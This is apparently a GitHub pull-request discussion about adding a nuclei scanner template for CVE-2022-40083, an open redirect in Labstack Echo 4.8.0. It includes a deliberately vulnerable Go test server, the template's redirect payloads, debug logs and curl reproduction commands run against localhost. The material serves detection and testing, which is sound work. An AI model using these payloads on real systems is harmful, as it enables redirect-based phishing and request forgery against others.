Added CVE-2022-40083 #5606
Conversation
@ehsandeep After building this out and testing it, I was not able to get nuclei to flag it as an issue, although I was able to just run the curl command and get it to redirect.

main.go:

package main

import (
	"github.com/labstack/echo/v4"
)

func main() {
	e := echo.New()
	// Serve the current directory through the Static handler affected by CVE-2022-40083.
	e.Static("/", "./")
	e.Logger.Fatal(e.Start(":1323"))
}

go.mod:

module ssrf/test

go 1.19

require github.com/labstack/echo/v4 v4.8.0

require (
	github.com/labstack/echo v3.3.10+incompatible // indirect
	github.com/labstack/gommon v0.3.1 // indirect
	github.com/mattn/go-colorable v0.1.11 // indirect
	github.com/mattn/go-isatty v0.0.14 // indirect
	github.com/valyala/bytebufferpool v1.0.0 // indirect
	github.com/valyala/fasttemplate v1.2.1 // indirect
	golang.org/x/crypto v0.0.0-20210817164053-32db794688a5 // indirect
	golang.org/x/net v0.0.0-20211015210444-4f30a5c0130f // indirect
	golang.org/x/sys v0.0.0-20211103235746-7861aae1554b // indirect
	golang.org/x/text v0.3.7 // indirect
)

Nuclei with template only:

└──╼ # echo http://127.0.0.1:1323/ | nuclei -v -t ~/nuclei-templates/cves/2022/CVE-2022-40083.yaml -debug
[INF] Using Nuclei Engine 2.8.8 (latest)
[INF] Using Nuclei Templates 9.3.6 (latest)
[INF] Templates added in last update: 30
[INF] Templates loaded for scan: 1
[INF] Targets loaded for scan: 1
[DBG] failed to parse payload {{BaseURL}}//interactsh.com%2f.. and http://127.0.0.1:1323.skipping param merge
[INF] [CVE-2022-40083] Dumped HTTP request for http://127.0.0.1:1323//interactsh.com%2f..
GET //interactsh.com%252f.. HTTP/1.1
Host: 127.0.0.1:1323
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
[WRN] [CVE-2022-40083] Could not execute request for http://127.0.0.1:1323/: GET http://127.0.0.1:1323//interactsh.com%2f.. giving up after 2 attempts: Get "http://127.0.0.1:1323//interactsh.com%252f..": failed to parse Location header "//interactsh.com%2f../": parse "//interactsh.com%2f../": invalid URL escape "%2f"
[INF] No results found. Better luck next time!

Curl request:

└──╼ # curl -L http://127.0.0.1:1323//interactsh.com%2f..
<!DOCTYPE html>
<html>
<body>
<body onload="window.location='https://app.interactsh.com';">
</body>
</html>

Am I doing something wrong or including the wrong package? Thank you!
@j1v37u2k3y There is a known bug in the nuclei engine which got fixed in PR projectdiscovery/nuclei#3243; if you try to run nuclei using the above PR, it should be working as expected.
@ehsandeep Ok, so I found some weird behavior with the PR that you suggested. Running two different variations produced different results based on URL patterns, but the curl command works on both variations.

Template used:

id: CVE-2022-40083

info:
  name: Labstack Echo 4.8.0 - Open Redirect
  author: pdteam
  severity: critical
  description: |
    Labstack Echo 4.8.0 contains an open redirect vulnerability via the Static Handler component. An attacker can leverage this vulnerability to cause server-side request forgery, making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
  remediation: Download and install 4.9.0, which contains a patch for this issue.
  reference:
    - https://github.com/labstack/echo/issues/2259
    - https://nvd.nist.gov/vuln/detail/CVE-2022-40083
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
    cvss-score: 9.6
    cve-id: CVE-2022-40083
    cwe-id: CWE-601
  tags: cve,cve2022,redirect,labstack

requests:
  - method: GET
    path:
      - "{{RootURL}}/{{redirect}}"

    payloads:
      redirect:
        - '/interactsh.com%2F..'
        - '/interactsh.com/%2F..'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interactsh.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

      - type: status
        status:
          - 301
          - 302
          - 307
          - 308
        condition: or

Results:

[INF] Using Nuclei Engine 2.8.8 (latest)
[INF] Using Nuclei Templates 9.3.6 (latest)
[INF] Templates added in last update: 30
[INF] Templates loaded for scan: 1
[INF] Targets loaded for scan: 1
[INF] [CVE-2022-40083] Dumped HTTP request for http://localhost:49366//interactsh.com%2F..
GET //interactsh.com%252F.. HTTP/1.1
Host: localhost:49366
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
[INF] [CVE-2022-40083] Dumped HTTP request for http://localhost:49366//interactsh.com/%2F..
GET //interactsh.com/%252F.. HTTP/1.1
Host: localhost:49366
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
[DBG] [CVE-2022-40083] Dumped HTTP response http://localhost:49366//interactsh.com/%2F..
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 31 Jan 2023 22:30:26 GMT
Location: //interactsh.com/%2F../
Content-Length: 0
[CVE-2022-40083:regex-1] [http] [critical] http://localhost:49366//interactsh.com/%252F.. [redirect="/interactsh.com/%2F.."]
[CVE-2022-40083:status-2] [http] [critical] http://localhost:49366//interactsh.com/%252F.. [redirect="/interactsh.com/%2F.."]
[WRN] [CVE-2022-40083] Could not execute request for http://localhost:49366: GET http://localhost:49366//interactsh.com%2F.. giving up after 2 attempts: Get "http://localhost:49366//interactsh.com%252F..": failed to parse Location header "//interactsh.com%2F../": parse "//interactsh.com%2F../": invalid URL escape "%2F"

curl commands with each redirect:

@j1v37u2k3y ➜ .../nuclei/v2/cmd/nuclei (issue-3242-make-request-fix) $ curl -L http://localhost:49366//interactsh.com%2F..
<!DOCTYPE html>
<html>
<body>
<body onload="window.location='https://app.interactsh.com';">
</body>
</html>
@j1v37u2k3y ➜ .../nuclei/v2/cmd/nuclei (issue-3242-make-request-fix) $ curl -L http://localhost:49366//interactsh.com/%2F..
<!DOCTYPE html>
<html>
<body>
<body onload="window.location='https://app.interactsh.com';">
</body>
</html>
@j1v37u2k3y ➜ .../nuclei/v2/cmd/nuclei (issue-3242-make-request-fix) $